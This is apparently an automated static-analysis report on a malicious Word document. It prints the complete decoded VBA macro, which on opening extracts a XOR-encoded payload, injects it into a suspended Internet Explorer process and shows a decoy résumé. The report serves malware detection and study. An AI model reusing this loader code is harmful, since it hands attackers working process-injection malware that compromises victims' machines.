Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d85e783b4594658c…

MALICIOUS

Office (OLE)

Size: 425.5 KB
Created: 2019-02-19 22:10:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: d84701cf6c7dceecfd71aa9282c8d945
SHA-1: 9fd24521d2e87c445b35b5e8aa57055208e93280
SHA-256: d85e783b4594658c1df49b286dc504becfe0b23092b21e3ee08949674d01c447
Risk score: 508

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic

The sample triggers critical heuristics for CVE-2007-3899, indicating exploitation of a Microsoft Word memory-corruption vulnerability. The VBA macros (with AutoOpen and Workbook_Open entry points) declare and call CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, which strongly suggests that a payload is written into a newly created process and executed there. The XOR-encoded strings further indicate obfuscation techniques commonly used by malware.

Heuristics (16)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical; CVE likely; id CVE_2007_3899]
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • OLE with Ole10Native — possible CVE-2026-21514 exploitation [high; CVE likely; id CVE_2026_21514]
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.Injection-6355574-0 [critical; id CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
  • Reference to WriteProcessMemory API [critical; id SC_STR_WRITEPROCESSMEMORY]
  • Reference to CreateRemoteThread API [critical; id SC_STR_CREATEREMOTETHREAD]
  • XOR-encoded strings (key 0x5A) [critical; id SC_XOR_ENCODED]
    Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
    Disassembly
    Attempted x86 opcode disassembly
    00053A35  1b1e              sbb ebx, dword ptr [esi]
    00053A37  0c1b              or al, 0x1b
    00053A39  0a13              or dl, byte ptr [ebx]
    00053A3B  6968741e16165a    imul ebp, dword ptr [eax + 0x74], 0x5a16161e
    00053A42  5a                pop edx
    00053A43  5a                pop edx
    00053A44  5a                pop edx
    00053A45  3939              cmp dword ptr [ecx], edi
    00053A47  295a0f            sub dword ptr [edx + 0xf], ebx
    00053A4A  0e                push cs
    00053A4B  1c77              sbb al, 0x77
    00053A4D  625a5a            bound ebx, qword ptr [edx + 0x5a]
    00053A50  5a                pop edx
    00053A51  0f0e              femms
    00053A53  1c77              sbb al, 0x77
    00053A55  6b6c161f5a        imul ebp, dword ptr [esi + edx + 0x1f], 0x5a
    00053A5A  5a                pop edx
    00053A5B  5a                pop edx
    00053A5C  5a                pop edx
    00053A5D  0f1413            unpcklps xmm2, xmmword ptr [ebx]
    00053A60  19151e1f5a1d      sbb dword ptr [0x1d5a1f1e], edx
    00053A66  3f                aas
    00053A67  2e0a28            or ch, byte ptr cs:[eax]
    00053A6A  35393f2929        xor eax, 0x29293f39
    00053A6F  0d33343e35        or eax, 0x353e3433
    00053A74  2d092e3b2e        sub eax, 0x2e3b2e09
    00053A79  3335345a1d3f      xor esi, dword ptr [0x3f1d5a34]
    00053A7F  2e0f293f          movaps xmmword ptr cs:[edi], xmm7
    00053A83  281538303f39      sub byte ptr [0x393f3038], dl
    00053A89  2e13343c          adc esi, dword ptr cs:[esp + edi]
    00053A8D  3528373b2e        xor eax, 0x2e3b3728
    00053A92  33                .byte 0x33
    00053A93  35                .byte 0x35
    00053A94  34                .byte 0x34
  • Reference to CreateProcess API [high; id SC_STR_CREATEPROCESS]
  • VBA macros detected [medium; 4 related findings; id OLE_VBA_MACROS]
    Document contains VBA macro code
  • CreateObject call [high; id OLE_VBA_CREATEOBJ]
    Matched line in script
      Dim wvghsQfShk
      Set wvghsQfShk = CreateObject("ADODB.Stream")
      wvghsQfShk.Type = UkCeYErodm
  • AutoOpen macro [low; id OLE_VBA_AUTOOPEN]
    Matched line in script
    Sub AutoOpen()
        hKpmtdwfbcVf
  • Workbook_Open macro [low; id OLE_VBA_WBOPEN]
    Matched line in script
    End Sub
    Sub Workbook_Open()
        hKpmtdwfbcVf
  • Environ() call (env variable access) [low; id OLE_VBA_ENVIRON]
    Matched line in script
        If Len(Environ("ProgramW6432")) > 0 Then
            MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
  • Reference to VirtualAlloc API [medium; id SC_STR_VIRTUALALLOC]
  • Legacy WordBasic auto-exec macro marker [medium; id OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info; id EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; id EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9311 bytes
SHA-256: 587c426db7189503e4ab9cced21d8f6620be462cf127b8671aabe87347d3ddc5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
85 of 149 identifiers look randomly generated (e.g. 'dtUbCrqDObPvicG') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const UkCeYErodm = 1
Const YFgeuyuYOq = 1, yENVLiDmOw = 2, GgKdJHhbKy = 8

Private Type sRBvucEtdXym
    DCAxJpegGSqO As Long
    SoAPFyfaUtau As Long
    mlOOvdnudbhm As Long
    mzqTxeHBQYhb As Long
End Type

Private Type pahHkgGUkaHd
    TmwZClrhEJpP As Long
    XeiQukksbzWK As String
    oiYzPGzZzSbi As String
    YAsZdlaJIacm As String
    FDMPWIeeaDUb As Long
    WmROJrbGYVGQ As Long
    XufAvYUPRnmU As Long
    ARqHAUkYYXlS As Long
    CdvuXeDoJeDG As Long
    MzDsaDIrrkqI As Long
    TfpYViOHyTNo As Long
    sQKJAwbrptVl As Long
    VOSBtOkJEUSs As Integer
    WcVMHooiSmrR As Integer
    YXodNLJHRaio As Long
    HFaRXngmEHWs As Long
    KgUxVoSeQjMy As Long
    uGAtnjfMJXYM As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As LongPtr, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As LongPtr
    Private Declare PtrSafe Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As LongPtr
    Private Declare PtrSafe Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As LongPtr, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As LongPtr) As LongPtr
    Private Declare PtrSafe Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal KyFIKwEtxLQd As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#Else
    Private Declare Function vYRRaPjKJcct Lib "kernel32" Alias "CreateRemoteThread" (ByVal DCAxJpegGSqO As Long, ByVal KlCGDQLHnEFf As Long, ByVal vBmxSvzOKqQL As Long, ByVal vUJelPEeCJAw As Long, DoRoxgPDXTQc As Long, ByVal ktMZudZfnqcy As Long, VjsOskExXqJU As Long) As Long
    Private Declare Function weMFAEEALOZs Lib "kernel32" Alias "VirtualAllocEx" (ByVal DCAxJpegGSqO As Long, ByVal rcPibAKGWPiv As Long, ByVal olYYRLaAcAxA As Long, ByVal PdhuJAzhZsqO As Long, ByVal osUYHPNtExGR As Long) As Long
    Private Declare Function jspvaDVaZVXp Lib "kernel32" Alias "WriteProcessMemory" (ByVal DCAxJpegGSqO As Long, ByVal gdaYUIRWpXmw As Long, ByRef zXWCLLTTeTpN As Any, ByVal cSrSAauGoQkL As Long, ByVal toaRriPmxoVv As Long) As Long
    Private Declare Function UueEbsZDAyRM Lib "kernel32" Alias "CreateProcessA" (ByVal kPBNwVgBOBbZ As String, ByVal DNuZSfCPsmWn As String, BSHcdYIDDQGa As Any, KlCGDQLHnEFf As Any, ByVal ZbNcIOBIaDxo As Long, ByVal ktMZudZfnqcy As Long, DDKtJlRVKPCk As Any, ByVal lpCurrentDriectory As String, WsdDSUOgFbIj As pahHkgGUkaHd, zJRAtIMNtCRN As sRBvucEtdXym) As Long
#End If

Sub hKpmtdwfbcVf()
    Dim AvbfMfOlMFUK As Long, CrnrWEgIYXnR As Variant, aybCpsxMPOMS As Long
    Dim eYJMjndWliMH As sRBvucEtdXym
    Dim NDRydauLrGFq As pahHkgGUkaHd
    Dim mixcHUtJfDZv As String
    Dim MDOyCzztxUrq As String
    Dim AjBvdifzXQ As String
    Dim RTiRHpQQIX() As Byte
    Dim hHPJyGviet As Boolean
    
#If VBA7 Then
    Dim DiaisoMVOzOL As LongPtr, lYlWHXgjcPLq As LongPtr
#Else
    Dim DiaisoMVOzOL As Long, lYlWHXgjcPLq As Long
#End If
    CrnrWEgIYXnR = vbhibywu

    If Len(Environ("ProgramW6432")) > 0 Then
        MDOyCzztxUrq = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
    Else
        MDOyCzztxUrq = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
    End If

    lYlWHXgjcPLq = UueEbsZDAyRM(mixcHUtJfDZv, MDOyCzztxUrq, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, mixcHUtJfDZv, NDRydauLrGFq, eYJMjndWliMH)

    DiaisoMVOzOL = weMFAEEALOZs(eYJMjndWliMH.DCAxJpegGSqO, 0, UBound(CrnrWEgIYXnR), &H1000, &H40)
    For aybCpsxMPOMS = LBound(CrnrWEgIYXnR) To UBound(CrnrWEgIYXnR)
        AvbfMfOlMFUK = CrnrWEgIYXnR(aybCpsxMPOMS)
        lYlWHXgjcPLq = jspvaDVaZVXp(eYJMjndWliMH.DCAxJpegGSqO, DiaisoMVOzOL + aybCpsxMPOMS, AvbfMfOlMFUK, 1, ByVal 0&)
    Next aybCpsxMPOMS
    lYlWHXgjcPLq = vYRRaPjKJcct(eYJMjndWliMH.DCAxJpegGSqO, 0, 0, DiaisoMVOzOL, 0, 0, 0)
    
    AjBvdifzXQ = Environ("TEMP") & "\Candidate-Resume-2019.doc"
    RTiRHpQQIX = wdablndx
    hHPJyGviet = TnmOqfNvca(AjBvdifzXQ, RTiRHpQQIX)
    
    Set temp = ActiveDocument
    Documents.Open (AjBvdifzXQ)
    temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub

Function TnmOqfNvca(nMhfWtYRnw, uffNizKKSN)
  Dim wvghsQfShk
  Set wvghsQfShk = CreateObject("ADODB.Stream")
  wvghsQfShk.Type = UkCeYErodm

  wvghsQfShk.Open
  wvghsQfShk.Write uffNizKKSN

  wvghsQfShk.SaveToFile nMhfWtYRnw, yENVLiDmOw
End Function

Sub AutoOpen()
    hKpmtdwfbcVf
End Sub
Sub Workbook_Open()
    hKpmtdwfbcVf
End Sub


Function vbhibywu() As Byte()
    Dim FHwuMmFxNTAMpys() As Byte
    Dim rjRyGoggFXixUjV As Long
    Dim dtUbCrqDObPvicG(7) As Byte
    Dim aybCpsxMPOMS As Long
    Dim iFmMPheuhFDGdlH() As Byte
    Dim hHPJyGviet As Boolean
    
    FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
    rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
    
    
        dtUbCrqDObPvicG(0) = 57
    
        dtUbCrqDObPvicG(1) = 78
    
        dtUbCrqDObPvicG(2) = 82
    
        dtUbCrqDObPvicG(3) = 67
    
        dtUbCrqDObPvicG(4) = 74
    
        dtUbCrqDObPvicG(5) = 89
    
        dtUbCrqDObPvicG(6) = 84
    
        dtUbCrqDObPvicG(7) = 89

    
    aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
    iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 212481 - 1)
    hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
    
    vbhibywu = iFmMPheuhFDGdlH
End Function

Function wdablndx() As Byte()
    Dim FHwuMmFxNTAMpys() As Byte
    Dim rjRyGoggFXixUjV As Long
    Dim dtUbCrqDObPvicG(7) As Byte
    Dim aybCpsxMPOMS As Long
    Dim iFmMPheuhFDGdlH() As Byte
    Dim hHPJyGviet As Boolean
    
    FHwuMmFxNTAMpys = UEpQaymsbv(ActiveDocument.FullName)
    rjRyGoggFXixUjV = UWJEcrrGZt(FHwuMmFxNTAMpys)
    
    
        dtUbCrqDObPvicG(0) = 55
    
        dtUbCrqDObPvicG(1) = 74
    
        dtUbCrqDObPvicG(2) = 65
    
        dtUbCrqDObPvicG(3) = 71
    
        dtUbCrqDObPvicG(4) = 82
    
        dtUbCrqDObPvicG(5) = 56
    
        dtUbCrqDObPvicG(6) = 79
    
        dtUbCrqDObPvicG(7) = 68

    
    aybCpsxMPOMS = jtGHjgeTHO(FHwuMmFxNTAMpys, dtUbCrqDObPvicG)
    iFmMPheuhFDGdlH = LrnUaWJVtv(FHwuMmFxNTAMpys, aybCpsxMPOMS + UWJEcrrGZt(dtUbCrqDObPvicG), 93184 - 1)
    hHPJyGviet = dPYqsoWost(iFmMPheuhFDGdlH, UWJEcrrGZt(iFmMPheuhFDGdlH))
    
    wdablndx = iFmMPheuhFDGdlH
End Function

Function UWJEcrrGZt(abArray() As Byte) As Long
    Dim nLen As Long
    UWJEcrrGZt = UBound(abArray) - LBound(abArray) + 1
End Function

Function UEpQaymsbv(ayPYliBNVT As String)
    Dim zJxZXxCHca() As Byte
    Dim ptYMxfMkoa As Integer: ptYMxfMkoa = FreeFile
    
    Open ayPYliBNVT For Binary Access Read As #ptYMxfMkoa
    ReDim zJxZXxCHca(0 To LOF(ptYMxfMkoa) - 1)
    Get #ptYMxfMkoa, , zJxZXxCHca
    Close #ptYMxfMkoa
    
    UEpQaymsbv = zJxZXxCHca
End Function

Function jtGHjgeTHO(pfvlQrqety() As Byte, nBuYVYWNNO() As Byte) As Long
    Dim zyabobJmqN As Boolean
    Dim uBgkizOBng As Long
    Dim LWnVcvGgUK As Long
    Dim tQNVJeQqRk As Long
    Dim kxKDAWkaFs As Long
    
    zyabobJmqN = False
    tQNVJeQqRk = UWJEcrrGZt(pfvlQrqety)
    kxKDAWkaFs = UWJEcrrGZt(nBuYVYWNNO)
    For uBgkizOBng = 0 To tQNVJeQqRk
        zyabobJmqN = True
        For LWnVcvGgUK = 0 To kxKDAWkaFs - 1
                If pfvlQrqety(uBgkizOBng + LWnVcvGgUK) <> nBuYVYWNNO(LWnVcvGgUK) Then
                    zyabobJmqN = False
                    Exit For
                End If
        Next LWnVcvGgUK
        If zyabobJmqN = True Then
            Exit For
        End If
    Next uBgkizOBng
    
    If zyabobJmqN = False Then
        jtGHjgeTHO = -1
    Else
        jtGHjgeTHO = uBgkizOBng
    End If
    
End Function

Function LrnUaWJVtv(pfvlQrqety() As Byte, xMZyrXvMCa As Long, eIbEiKWFpb As Long) As Byte()
    Dim jHrsfbohVM() As Byte
    Dim uBgkizOBng As Long

    For uBgkizOBng = 0 To eIbEiKWFpb
        ReDim Preserve jHrsfbohVM(uBgkizOBng)
        jHrsfbohVM(uBgkizOBng) = pfvlQrqety(xMZyrXvMCa + uBgkizOBng)
    Next uBgkizOBng
    
    LrnUaWJVtv = jHrsfbohVM
End Function

Function dPYqsoWost(aLroiYYqoh() As Byte, eIbEiKWFpb As Long)
    
    Dim MdvQvXHAeI As Byte
    Dim mLwgcnLowc As Long
    MdvQvXHAeI = 90
    
    For mLwgcnLowc = 0 To eIbEiKWFpb - 1
        aLroiYYqoh(mLwgcnLowc) = aLroiYYqoh(mLwgcnLowc) Xor MdvQvXHAeI
    Next mLwgcnLowc
    
End Function
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612090647/Ole10Native | 212955 bytes
SHA-256: bdb813ee80f9f95855db02e810e4e51d75009a7b4e76d641f2e2f93bf7707166
ole10native_01.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612090648/Ole10Native | 93658 bytes
SHA-256: c94978050593ac6cced76ff449533df0c13a2dd7ecdfee9e6796561f584b54ec